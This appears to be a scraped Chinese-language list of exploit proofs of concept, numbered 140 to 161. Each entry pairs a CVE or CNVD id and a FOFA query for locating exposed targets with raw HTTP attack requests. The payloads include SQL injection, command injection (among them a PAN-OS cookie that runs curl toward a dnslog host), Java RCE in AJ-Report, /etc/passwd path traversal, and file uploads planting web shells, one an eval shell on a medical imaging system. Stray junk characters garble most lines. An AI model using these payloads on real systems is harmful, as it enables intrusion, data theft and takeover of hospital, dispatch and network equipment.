- m' A+ V2 z4 `* rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 X) a8 [4 D ^2 z( S& T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) z$ y2 ?! h. L, @! a
Accept-Encoding: gzip, deflate, br6 B( \$ `7 e5 b+ I' R1 @6 V$ Q
Connection: close% K! @+ m5 z9 M
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk2 D$ X9 [1 L: B3 W' G" K; Q
Upgrade-Insecure-Requests: 10 [4 d- T# U7 `5 d
' u& V# A+ j- w$ N$ W5 \ w
, W: K4 m+ j# K6 X! @/ J% v5 t( W5 r! P140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入/ O" o h ?) g! @9 _
CVE-2024-2566
5 M& V' W& v' F+ Y# q. V, sFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"0 `* [# K( u, N4 j' ?0 O
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1 J" t7 q# ]0 @
Host: x.x.x.x
) S1 g( [5 S7 |+ k0 `' T4 F- ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' P8 z4 H/ C1 x; i, S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Q3 F5 N; x4 d' W2 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% M, X+ E; ^) I! O' O) \: |
Accept-Encoding: gzip, deflate, br
" h7 u$ J6 f5 N, l) O- _/ _- fConnection: close! s" z0 l+ [$ Y I# Q2 N
Cookie: authcode=h8g9. G( k2 {0 f3 o, Y$ T5 L
Upgrade-Insecure-Requests: 11 F1 f: _4 R& ]+ h
% [1 W% J. @, t* k7 K/ f# T9 ^8 w
* ?, u- p( L/ P4 K; y; j141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入. g# k$ @ P- _& h6 Y
FOFA:body="指挥调度管理平台"
, w5 M& D0 z8 f# cPOST /app/ext/ajax_users.php HTTP/1.1) _1 n+ s" T. F) N9 _- H
Host: your-ip7 v% n2 z0 ?2 A- J! G9 l. b
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info' V- ~3 J* {& g7 X/ T) _+ K# Z
Content-Type: application/x-www-form-urlencoded
0 ?1 T0 W0 q4 s: V3 @4 j& P
9 f" Q3 J }; L
+ S; Z5 B! x0 R' h) o7 jdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
) q* B7 U+ y+ f. q% z7 w$ L0 ~. }( [ `4 ?
3 ^6 Q* w( S- ]4 x( t2 W' P1 o' r142. CMSV6车辆监控平台系统中存在弱密码$ G' h0 t% B1 s4 P7 f
CVE-2024-29666
8 Z# [8 _$ k( r0 Y8 _. zFOFA:body="/808gps/"3 {3 P7 b; f& e4 |+ t6 R: b% V& F5 I
admin/admin
& I& B6 b6 S# a2 U1 v0 N) n143. Netis WF2780 v2.1.40144 远程命令执行
# D& H: r# i, l( V' T# r K( pCVE-2024-258502 U t: t( {& Y& I1 M0 Z
FOFA:title='AP setup' && header='netis'
/ o$ Y% O! t2 \, @& |PAYLOAD
- Y$ G! {9 E4 i& d7 h! Z- N- ^$ x
" @9 Q" x2 i4 {. _0 R: p2 U9 t) b144. D-Link nas_sharing.cgi 命令注入" L$ b- n3 @& R' Z) Y6 D0 K/ b
FOFA:app="D_Link-DNS-ShareCenter"! R2 n1 d: n# D3 w/ T8 F: y+ ?3 }
system参数用于传要执行的命令
8 Z: K1 K+ k8 k0 |' Z6 @- W& lGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
+ @6 e# B* A, v# XHost: x.x.x.x
2 [* _9 _8 j* q$ ^2 U$ Z+ MUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
7 q5 J/ w; N7 ?Connection: close
' ^5 F4 `3 ]* P( DAccept: */*
* S) B; ]; a6 s4 kAccept-Language: en! ?" h. @3 H8 S; J7 T
Accept-Encoding: gzip
. _( {6 \! Z* S2 e: b+ Y" F
& S. O4 B E7 K @* L/ l
* ^3 H- i5 }7 E& d. x; q145. Palo Alto Networks PAN-OS GlobalProtect 命令注入3 m' Q" U4 t2 k6 h; `' c8 {
CVE-2024-3400& s1 w j( p: e p* v! m
FOFA:icon_hash="-631559155"
% W! S( r! z! K" a. xGET /global-protect/login.esp HTTP/1.1% h: \, S) t' S4 J
Host: 192.168.30.112:1005
; W. ^$ s4 Z, ~1 ^# uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
# Y- ^3 r- d. b3 ~# @6 M5 [Connection: close$ g# _: e+ v; o2 Z
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
3 _: v" X. [; ], ?7 S" wAccept-Encoding: gzip( N* K3 {2 S2 ~
! |0 N1 b* G- v2 [, b; `
# E4 t/ d7 u* l- t8 F
146. MajorDoMo thumb.php 未授权远程代码执行
. A) Z2 z; ?5 \4 o3 |( i0 ICNVD-2024-02175& K% h) m( j8 A" e+ B% I
FOFA:app="MajordomoSL"+ @! m+ o) b% }) N q* u* q! b( R
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
. u/ K( N. i( S4 T/ p. @Host: x.x.x.x
! O1 d/ }0 N. W/ H# {6 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84 J; j8 ? \2 r. T9 b
Accept-Charset: utf-8
: f* k0 l( E" w) LAccept-Encoding: gzip, deflate1 k8 U$ w3 e3 o1 b' t& H% e, u; N
Connection: close
N) {( y1 B- v3 {0 @1 o- q" e& @3 c/ Y' K" W F, \) |2 T
& l0 R/ s9 A8 C8 s4 I' ~
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历& |$ ~$ K3 Z+ h
CVE-2024-32399
; O1 L' m- x( y: f% E# c( vFOFA:body="RaidenMAILD"6 J5 s2 z7 Q: [( }" N
GET /webeditor/../../../windows/win.ini HTTP/1.1
F4 o" M" ^+ Z( G0 e' DHost: 127.0.0.1:81
: A& h& F* x9 DCache-Control: max-age=0
; Y$ V' D; p6 {, \Connection: close2 l1 w( n4 l% Y6 h% R
1 {5 s0 A4 E) u! r6 V3 ~% W$ V
: N- C1 n9 ~' e148. CrushFTP 认证绕过模板注入
+ b- ? H8 j8 U' {- j! aCVE-2024-40403 K3 [0 o0 _* \* T) k8 t' ~
FOFA:body="CrushFTP"* p5 _8 W( g$ Q4 K
PAYLOAD# p' Q w2 z& j f; j; ~
& I" B. F7 @1 z; f& S+ m- g# ]5 |" p
149. AJ-Report开源数据大屏存在远程命令执行
( J' x- F9 v2 ~7 gFOFA:title="AJ-Report"
& J% w5 s B4 ^7 O: D
/ R6 X0 r v3 ?& r: o$ I8 }POST /dataSetParam/verification;swagger-ui/ HTTP/1.1& i0 q$ u: Z4 i# t
Host: x.x.x.x
0 Y6 F2 q9 u' D9 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. i; o. @* x X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* k7 n- K9 _0 s+ b0 r/ q5 w0 C* QAccept-Encoding: gzip, deflate, br9 P/ q- G, J4 K2 M
Accept-Language: zh-CN,zh;q=0.9: X5 _3 c5 }1 U$ Q* l; S% c; I" U
Content-Type: application/json;charset=UTF-8
2 E% y. _7 ~) m( y, s& e1 QConnection: close
. ]% P1 b' b0 g# L" D/ V0 J" s2 i0 j- s6 F+ Z
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
+ k8 K+ v s' v o# \; U* e* e! D2 n: ?( O
150. AJ-Report 1.4.0 认证绕过与远程代码执行
+ N9 S: c8 x$ N& p$ T& v8 f. t2 ]FOFA:title="AJ-Report"
9 }/ s. p, r& f1 @POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
& v! | q+ Y2 V; w+ uHost: x.x.x.x9 I7 j0 r& f, b. f& Y$ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" ]) ^4 y6 k ^- A7 i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ L# o3 e$ _* K( q( T& V/ PAccept-Encoding: gzip, deflate, br9 G0 H" ?. B5 q( E1 M# Y
Accept-Language: zh-CN,zh;q=0.9: M: B Q7 I `, h
Content-Type: application/json;charset=UTF-8) L. e6 ~# |3 s0 a
Connection: close
0 D1 g, \/ S5 o# Z6 [ ~Content-Length: 339
; m( ] E! i$ C* e/ U, U) {/ u2 B! Y$ l- Z8 K
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}) Q( H, U% m1 M1 P9 B
; ]. N: F0 `, x d0 |6 g K2 ^. ^: g3 B# k# W! o
151. AJ-Report 1.4.1 pageList sql注入
: i! l$ S* }' F0 g4 f# ?7 OFOFA:title="AJ-Report"
0 M* E+ T* A3 l9 \2 _& H* uGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1 {& |/ A$ e+ d# x4 S- K% m; L
Host: x.x.x.x, m i8 U J; E$ c6 ~0 _ E. B- b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' B" K4 }7 {1 S5 M8 O2 ^
Connection: close
3 O% R7 t, Z! f( Y( [" ]6 DAccept-Encoding: gzip
9 Y8 o4 \/ g: }6 e3 N/ D6 q, L. c# r( ]% C$ h. \0 O! {
6 {2 Q. W% l# x8 i5 n6 N) b
152. Progress Kemp LoadMaster 远程命令执行
$ _! q& H. H$ \, T7 g# F1 [CVE-2024-12121 N: y+ \2 H. M% _
LoadMaster <= 7.2.59.2 (GA)
% k9 Z6 c+ @% o i9 _LoadMaster<=7.2.54.8 (LTSF)
; f* x! C& {+ C1 JLoadMaster <= 7.2.48.10 (LTS)& R7 O5 [; n' E7 b: [( z2 W$ n
FOFA:body="LoadMaster"
& u# g1 O; K& ~3 BJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码, E0 a$ J$ X; Z6 F$ P$ ~. m
GET /access/set?param=enableapi&value=1 HTTP/1.17 C: K; }9 w7 r
Host: x.x.x.x
0 h, ~- k/ G* N3 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
) u6 Q# s; b( n4 U- {7 }Connection: close
8 S6 L3 u/ Y$ I9 ]" ZAccept: */*
; h' b" s* `" CAccept-Language: en
, g1 l/ z& r% L J9 |2 dAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
{! F3 G) j( H' CAccept-Encoding: gzip
4 Q+ c8 h9 | q U! m" {# w/ F4 O3 h3 w3 S
4 D$ r) C$ o @3 W6 Y# H
153. gradio任意文件读取+ J2 S) ], [* r+ `
CVE-2024-1561FOFA:body="__gradio_mode__", g4 |! h) h3 g
第一步,请求/config文件获取componets的id
8 A0 @& V% D# k9 Z: mhttp://x.x.x.x/config
: p/ B. R+ M2 `+ ]9 `
- g4 d9 Z6 A) y/ S( ]( s7 V( W: [8 n2 {, \/ L' V) ?8 o
第二步,将/etc/passwd的内容写入到一个临时文件/ V6 Z9 ]& J# {# N
POST /component_server HTTP/1.1* }" n& {2 k7 q0 q, ^ G% S9 z& ]% V
Host: x.x.x.x
% o5 K& J, c; d) |$ jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
' z: v* z- k3 GConnection: close
/ c) H$ V$ r+ \, Y( c7 vContent-Length: 115' y/ @- n1 f& U Y/ Q
Content-Type: application/json
- I k0 i# f: f! T1 H- V; iAccept-Encoding: gzip! s4 a4 g" f( l {- q8 F
/ y% i4 `1 i2 i2 W3 d q
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}; p, G2 V0 g* t+ h
; P/ q$ d4 ~& A# {
. U3 a; A7 y7 q0 O3 \' J
第三步访问" s% D% L5 x1 s# ]
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
) x+ @7 `, f4 t/ s8 x# s! B( P, M) j
% x- f0 _) m- b; K. J154. 天维尔消防救援作战调度平台 SQL注入( y# u7 E& T+ a& r; A4 N
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入") I& r" m# w8 G
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
1 L/ M9 v) Q- G0 VHost: x.x.x.x3 |9 k+ t. }* K* z' s
Content-Length: 106
4 ^6 W( r6 Q7 g* d; }5 t3 bCache-Control: max-age=0
6 d6 U3 N4 Y& y& d% _7 nUpgrade-Insecure-Requests: 1$ q0 n; B* m9 ]
Origin: http://x.x.x.x; t- r" h1 B8 [4 ^$ x
Content-Type: application/json) F$ A7 |! U' j; v2 Y/ `: [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
% M- L' P! K* K# V4 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 K. b4 [( y% V4 x" I
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page9 [( B% Y5 s0 y0 N
Accept-Encoding: gzip, deflate
) s- f, u2 @+ `3 O3 d+ FAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
P6 S7 r/ Z# JConnection: close
9 { _0 b0 Z2 k7 Q5 o/ \* Z1 u! C8 N
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
* f6 Y& ~: n; j' E( o$ \; d9 T- A8 S( [ K& O1 q; B
3 b6 x s) X0 E- [155. 六零导航页 file.php 任意文件上传: P$ d' z. K# e5 Z5 ^. U
CVE-2024-34982
+ o5 ^: J0 O5 w' ~FOFA:title=="上网导航 - LyLme Spage"
2 o/ Q8 x* X4 m& o" OPOST /include/file.php HTTP/1.1
4 {/ l* G$ t* x: aHost: x.x.x.x
1 S1 e& X, s+ F+ e AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
" @* y# ?& H% d& K$ A/ n( ?Connection: close
& X. c* O+ G8 X' [- ZContent-Length: 232' u8 ^- g+ y8 j: u
Accept: application/json, text/javascript, */*; q=0.01* P0 n0 {& e3 f9 S, K/ a( t
Accept-Encoding: gzip, deflate, br
6 Q$ L# z3 f& zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ x; `. d5 z o$ O# A) pContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
; O. m4 n/ y" }8 vX-Requested-With: XMLHttpRequest
& o$ e d. Z- R
- u4 U7 n' @- _9 ^" t+ Q3 k; y-----------------------------qttl7vemrsold314zg0f
; s" s4 N( D' z5 L- W4 W NContent-Disposition: form-data; name="file"; filename="test.php"* C3 v: [- k' Y# o3 x/ B/ y* x
Content-Type: image/png
' Q, ^. a8 \& P9 q% x- E1 ~* h# ~! Z8 X' B& S
<?php phpinfo();unlink(__FILE__);?>
5 }6 `1 l8 @8 \, n; q5 l, ]-----------------------------qttl7vemrsold314zg0f--! Y* {) k3 C% m h7 ]/ n4 o
: f# S4 `3 f( ^/ ^8 U, G1 V
' K; O# ?/ X( |) S访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php- J* m& i1 s3 R9 j3 \
2 M7 p- h: b% J9 l( ~% d
156. TBK DVR-4104/DVR-4216 操作系统命令注入6 [8 l3 ~4 T) L/ C. a% ?$ N
CVE-2024-3721
6 ]3 }0 s9 y; q1 LFOFA:"Location: /login.rsp", ]4 T% [, Z, d: ]3 i6 c1 b
·TBK DVR-41046 G7 O' M4 m* ]
·TBK DVR-4216
8 J4 k8 n& h, o ocurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
0 M1 z2 q7 W, n0 \% X; B2 x+ T A; X9 b1 U+ q8 u9 n+ q# T
' L0 B1 ~5 c8 w) L
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
6 h7 o; \/ I _2 S: W" B* @Host: x.x.x.x
7 I7 P. D1 d+ K$ _: b' e2 AUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 `7 {; G* K1 a+ Z; F5 iConnection: close
# H2 h8 y$ Q6 `+ cContent-Length: 0" {* {5 b A3 v1 ?
Cookie: uid=10 @" O* k$ T Y, a6 ^
Accept-Encoding: gzip
) B8 x" \' p9 c: _6 N0 D" n/ v
+ o9 N+ k' G2 F* Q- w& E
157. 美特CRM upload.jsp 任意文件上传
, B1 r% k! H# @, a9 Z, t5 i4 i3 {CNVD-2023-06971
7 g. c" Z7 {' K( V1 o; bFOFA:body="/common/scripts/basic.js"& f4 H2 i2 c! h: Q! [ U- M8 c9 Z
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.19 b4 f/ i0 A' e0 ^- }
Host: x.x.x.x) y1 V8 f) k+ M" u: Q" |/ i/ H, H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36( T0 |+ b" S: S5 A7 X
Content-Length: 709
" v- t/ Z3 M* o( V2 a0 ]2 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; u; ?0 i( c( p7 u5 ~: E* s
Accept-Encoding: gzip, deflate8 k5 s# u* j H7 U& S( T, f
Accept-Language: zh-CN,zh;q=0.9
8 f* E1 T: @; f* r% a/ LCache-Control: max-age=0/ S- f" Z( _& `
Connection: close
0 E! b$ s5 k. v+ Q* BContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
* D1 B' E% _8 C' BUpgrade-Insecure-Requests: 11 L; ^7 d% I8 m3 q
% G* L1 z/ j* h/ i- |------WebKitFormBoundary1imovELzPsfzp5dN6 c# v5 q; ]1 S) ^4 N
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp", x" A$ @+ M7 U" e+ R
Content-Type: application/octet-stream
1 u' ?& F d6 u: S& W- C( T
9 m) G1 g" S% @, a6 qnyhelxrutzwhrsvsrafb& K2 K, U( @/ Y" Q. ]5 t
------WebKitFormBoundary1imovELzPsfzp5dN
9 F7 c0 U9 W$ l) `: DContent-Disposition: form-data; name="key"
/ R9 \3 t+ z7 g8 R2 Y5 T) `2 f
- x7 u3 l% D( s7 r. r$ vnull
0 t7 [& Q- q9 ]8 B------WebKitFormBoundary1imovELzPsfzp5dN
( Y- {# d# \/ H3 q, }Content-Disposition: form-data; name="form"
) S0 w$ a \/ s, E. z) T3 y1 i/ a9 l7 |1 y, d- W' a: ~* z% n
null
* S ]0 M7 V0 U# R6 e------WebKitFormBoundary1imovELzPsfzp5dN
/ f/ w ?6 j) r3 C$ Z" \Content-Disposition: form-data; name="field"
+ z; G6 K' i; C7 f' r5 Y. \. \' Y- u6 H( I
null
3 x# p4 R: s( ?. O3 c( P: h) y------WebKitFormBoundary1imovELzPsfzp5dN$ J2 P& J/ R ?7 T8 F% w1 x T
Content-Disposition: form-data; name="filetitile"- P! |% e. B: p! F/ s) `" `- y
& {3 A; e- x2 f& d/ ?3 `' d% h
null
, T9 G* q! a# j------WebKitFormBoundary1imovELzPsfzp5dN# M8 \' Y. h3 m7 D( F
Content-Disposition: form-data; name="filefolder"5 O9 }" _6 d, p1 B* p
5 c1 R! R/ A8 z9 ~* i" Q' F. hnull) s4 Q; @* v3 h5 H: a+ p2 x* i, K
------WebKitFormBoundary1imovELzPsfzp5dN--) E. M9 v+ m3 \; P& F
1 v: g/ ?5 N* J# F
' K0 P) n, i9 `. h$ Yhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
' T% t( O" i! d+ I- t2 F _1 V* A& t" @! y. ?* {
158. Mura-CMS-processAsyncObject存在SQL注入
# g2 w. c" c# C1 a/ b) g NCVE-2024-32640 B9 N& z" d5 R! `
FOFA:"Generator: Masa CMS") h: G$ Q R, Y0 w
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1& {+ f! C* h+ Q' P7 w
Host: {{Hostname}}
5 A( [& y$ q! E7 o* @ i7 b' q7 aContent-Type: application/x-www-form-urlencoded
0 _; t) p2 w p
0 `" |3 r% Y7 T) X, D7 J) {object=displayregion&contenthistid=x\'&previewid=1
; U3 u3 W [5 `! [0 l1 a! {% |9 U( K& X; W' z5 q2 F5 U4 [7 E+ u& h
& x4 b* D) N4 W1 N# w
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传5 }. I) _5 h* E* p0 {
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
9 T5 }! S0 N$ X4 g$ {5 jPOST /webservices/WebJobUpload.asmx HTTP/1.1
8 ~7 K2 n' w: B& mHost: x.x.x.x
& q; g5 {. g9 K4 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36/ q5 J$ J% u* Z% v: W! K
Content-Length: 1080
% ?4 ?$ Z: O/ _' j) |1 iAccept-Encoding: gzip, deflate; O$ ~$ y! t' ]3 o3 Z! o2 d' s
Connection: close
' y( R4 m* p. g+ IContent-Type: text/xml; charset=utf-8
9 k( D" `- t% S; V$ ?' lSoapaction: "http://rainier/jobUpload"
; b& k3 z5 H! l3 G6 Q& t4 [- |0 f# ^; R. n
<?xml version="1.0" encoding="utf-8"?>9 n8 ~4 L; i' x0 j
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 z; S9 c5 V; L h) B<soap:Body>
! J5 I+ i" A8 t<jobUpload xmlns="http://rainier">
/ m) i$ d1 }6 x8 A- ?+ n2 R6 f: N: U<vcode>1</vcode>9 A! \; \; G$ B# s2 ?
<subFolder></subFolder>
5 R6 j, V. ], S5 K) b<fileName>abcrce.asmx</fileName>8 W8 E. ~, t( o! \
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>& _, d) k" T5 L6 n7 ^$ y! f% U# T
</jobUpload>4 N& Y* ~7 z' b0 P" L
</soap:Body>
' C2 L. j! F. {2 @</soap:Envelope>
1 C' O4 L8 L/ j; w, H4 \8 B, C* y/ i( w$ N) S: Y: Y
" E# O& E4 _$ \8 E5 k
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")8 e, m8 X1 P c
) N/ }2 j1 ?) L) ~2 d
' M% ?* h) W) ]" d( R160. Sonatype Nexus Repository 3目录遍历与文件读取
+ u' W4 ^" i |; x' t7 v5 kCVE-2024-49569 E* b& P% o* `( I8 a, T Y
FOFA:title="Nexus Repository Manager"* {/ d' R( B4 k
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
% i1 Q/ d" p- ? p4 ^6 _" l+ dHost: x.x.x.x
- _: G; z$ S+ g- Y5 w7 E2 R5 @User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
' k" y8 S0 m3 c/ f5 F3 LConnection: close
9 d- m0 G# p* S' gAccept: */*
8 c3 C3 e" i% v( U3 YAccept-Language: en2 E. D3 }- d) N( f+ @
Accept-Encoding: gzip
" y8 s5 @; d8 d) X5 R$ U
( O) V0 { O& c5 }( q6 b( j
. k$ R! t, O0 I f* s161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传- B% Z m9 p/ T1 ^; @4 c
FOFA:body="/KT_Css/qd_defaul.css"1 s! E0 E8 I8 \2 h3 e
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密5 d" W$ ^+ l5 y8 Y+ A
POST /Webservice.asmx HTTP/1.1
. F$ h6 N, U+ Y4 U5 @Host: x.x.x.x
' o6 s5 P# B/ i# B5 w# Z) VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.365 u' q! \) n4 d& Y+ z: d, ]
Connection: close
/ h% ~4 g3 C w9 GContent-Length: 445
% O9 ?& b' N5 b4 C0 M6 T dContent-Type: text/xml b8 ^0 D# h! s1 k- y; V$ ~2 p
Accept-Encoding: gzip
0 v, |- b( Z7 v/ n4 C, _* b' u% U' {4 B. Z# p: B
<?xml version="1.0" encoding="utf-8"?>- G% `9 X- a- K" I7 e# y& i
<soap:Envelope xmlns:xsi=". i3 J" ^' I, s
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
/ @6 v7 ]. _: k Fxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
) N$ `* S5 H9 n' C4 |<soap:Body>
! I# Y. J' C, G, O9 Q<UploadResume xmlns="http://tempuri.org/">1 w, X, X; `" B; Q7 Z2 L
<ip>1</ip>
6 m# O/ M% k; ?* X0 A1 a<fileName>../../../../dizxdell.aspx</fileName>& u9 o9 { W! f) i o. m( Y
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
% `) |5 a6 v4 S9 e: T7 P8 h' v<tag>3</tag>
+ U3 V# N8 }+ {# @7 y1 }</UploadResume>
! Y+ F3 Q" T- U P</soap:Body>
7 Z# m# \" u$ Z1 a( {</soap:Envelope>
5 ]* h& N, ^/ W& S: T$ @) N/ e# z5 E) M' `
0 u/ H- r) B) F0 K& f
http://x.x.x.x/dizxdell.aspx
* `0 G7 ^" L$ t& p$ j2 M- ]& c( m# T( a! a0 I/ o
